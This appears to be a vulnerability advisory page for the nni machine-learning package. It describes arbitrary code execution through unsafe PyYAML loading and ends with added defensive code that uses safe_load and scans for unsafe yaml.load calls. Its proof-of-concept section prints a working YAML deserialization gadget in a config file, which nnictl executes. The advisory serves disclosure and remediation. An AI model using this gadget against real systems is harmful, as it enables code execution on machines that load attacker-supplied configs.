nni@0.7.1 vulnerabilities

Neural Network Intelligence project

  • latest version

    3.0

  • latest non vulnerable version

  • first published

    5 years ago

  • latest version published

    1 year ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the nni package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability    Vulnerable Version
    • C (Critical severity)
    Arbitrary Code Execution

    nni is a Neural Network Intelligence package

    Affected versions of this package are vulnerable to Arbitrary Code Execution because they parse YAML input with yaml.load() and a loader that honours PyYAML's python-specific tags (for example !!python/object/new and !!python/name). A crafted YAML document can therefore instantiate arbitrary Python objects and run attacker-supplied code in the process that loads it.

    How to fix Arbitrary Code Execution?

    Upgrade nni to version 2.1 or higher.

    [,2.1)
    • H (High severity)
    Arbitrary Code Execution

    nni is a Neural Network Intelligence package

    Affected versions of this package are vulnerable to Arbitrary Code Execution. The experiment configuration file passed to nnictl is parsed with yaml.load() using a loader that accepts PyYAML's python-specific tags, so a malicious config file can execute attacker-controlled code when the experiment is created.

    PoC

    1. Create the following PoC file, exploit.py. The authorName value is the well-known PyYAML gadget: !!python/object/new:type builds a class whose extend attribute is the builtin exec, and the listitems entry is then passed to that extend, which runs the string as Python code. The remaining keys are an ordinary nni experiment config so that nnictl accepts the file.
    
    import os
    
    # Install the vulnerable package (any version before 2.1).
    os.system('pip3 install nni')
    
    # Experiment config whose authorName field carries the deserialization payload.
    exploit = """authorName: !!python/object/new:type
      args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
      listitems: "__import__('os').system('xcalc')"
    experimentName: example_mnist_pytorch
    trialConcurrency: 1
    maxExecDuration: 1h
    maxTrialNum: 10
    #choice: local, remote, pai
    trainingServicePlatform: local
    searchSpacePath: search_space.json
    #choice: true, false
    useAnnotation: false
    tuner:
      #choice: TPE, Random, Anneal, Evolution, BatchTuner, MetisTuner, GPTuner
      #SMAC (SMAC should be installed through nnictl)
      builtinTunerName: TPE
      classArgs:
        #choice: maximize, minimize
        optimize_mode: maximize
    trial:
      command: python3 mnist.py
      codeDir: .
      gpuNum: 0
    """
    
    # Write the config to disk and hand it to nnictl, which parses it with yaml.load().
    open('exploit.yml', 'w+').write(exploit)
    os.system('nnictl create --config exploit.yml')
    
    2. Run the PoC from a terminal: python3 exploit.py
    3. Check the result: xcalc pops up, showing that the payload embedded in the config file was executed while nnictl parsed it.
    

    How to fix Arbitrary Code Execution?

    Upgrade nni to version 2.1 or higher.

    [,2.1)
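Both entries above describe the same defect: YAML is parsed with yaml.load() and a loader that honours PyYAML's !!python/* tags, so the fix on the project side is the upgrade to 2.1. The example below is added here and is not nni's or Snyk's code. It shows the hardened form of the config reader (yaml.safe_load, whose SafeLoader rejects the PoC's !!python/object/new:type tag with a ConstructorError instead of executing it) together with a standard-library AST scanner for finding yaml.load() calls in your own code that still accept such tags. The function names, the UNSAFE_LOADERS set and the SAMPLE_SOURCE snippet are assumptions constructed for this example; SAMPLE_SOURCE imitates a pre-2.1 style config reader and is not nni's actual source. Only load_experiment_config needs PyYAML installed.

```python
"""Hardened YAML config loading plus a scanner for unsafe yaml.load() calls.

Added example, not code from nni or Snyk. Names below are chosen for the
example and are not part of either project.
"""
import ast

try:
    import yaml  # PyYAML; needed only by load_experiment_config
except ImportError:
    yaml = None

# Loader classes that still construct arbitrary Python objects from tags.
# (Loader was the pre-5.1 PyYAML default; FullLoader has had its own bypasses.)
UNSAFE_LOADERS = {"Loader", "UnsafeLoader", "FullLoader"}


def load_experiment_config(text):
    """Parse an experiment config with yaml.safe_load.

    SafeLoader only knows the core YAML tags, so a document carrying
    !!python/object/new:type (as in the PoC) raises ConstructorError,
    a subclass of yaml.YAMLError, rather than instantiating anything.
    """
    if yaml is None:
        raise RuntimeError("PyYAML is required for load_experiment_config")
    try:
        config = yaml.safe_load(text)
    except yaml.YAMLError as exc:
        raise ValueError("refusing to load config: %s" % exc) from None
    if not isinstance(config, dict):
        raise ValueError("experiment config must be a YAML mapping")
    return config


def _loader_name(node):
    """Bare name of a Loader argument: yaml.SafeLoader -> 'SafeLoader'."""
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return None


def find_unsafe_yaml_loads(source):
    """Return [(lineno, reason)] for each yaml.load(...) call in `source`
    that passes no Loader (older PyYAML then falls back to an unsafe
    default) or passes one of UNSAFE_LOADERS. yaml.safe_load and
    yaml.load(..., Loader=yaml.SafeLoader) are not reported.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if not (isinstance(func, ast.Attribute) and func.attr == "load"
                and isinstance(func.value, ast.Name)
                and func.value.id == "yaml"):
            continue
        loader = None
        for kw in node.keywords:
            if kw.arg == "Loader":
                loader = _loader_name(kw.value)
        if loader is None and len(node.args) >= 2:
            loader = _loader_name(node.args[1])  # Loader passed positionally
        if loader is None:
            findings.append((node.lineno, "yaml.load without Loader"))
        elif loader in UNSAFE_LOADERS:
            findings.append((node.lineno, "yaml.load with %s" % loader))
    return sorted(findings)


# Constructed sample source in the style of a pre-2.1 config reader
# (not nni's real code), used to exercise the scanner.
SAMPLE_SOURCE = """\
import yaml
def get_yml_content(path):
    with open(path) as f:
        return yaml.load(f)                       # flagged: no Loader
def other(path):
    with open(path) as f:
        a = yaml.load(f, Loader=yaml.FullLoader)  # flagged: FullLoader
        b = yaml.load(f, yaml.SafeLoader)         # ok
        c = yaml.safe_load(f)                     # ok
    return a, b, c
"""

if __name__ == "__main__":
    for lineno, reason in find_unsafe_yaml_loads(SAMPLE_SOURCE):
        print("line %d: %s" % (lineno, reason))
```

Run the scanner over any tooling of your own that reads nni config files or wraps nnictl; upgrading nni to 2.1 closes the hole in the package itself but not in callers that copied the same yaml.load() pattern.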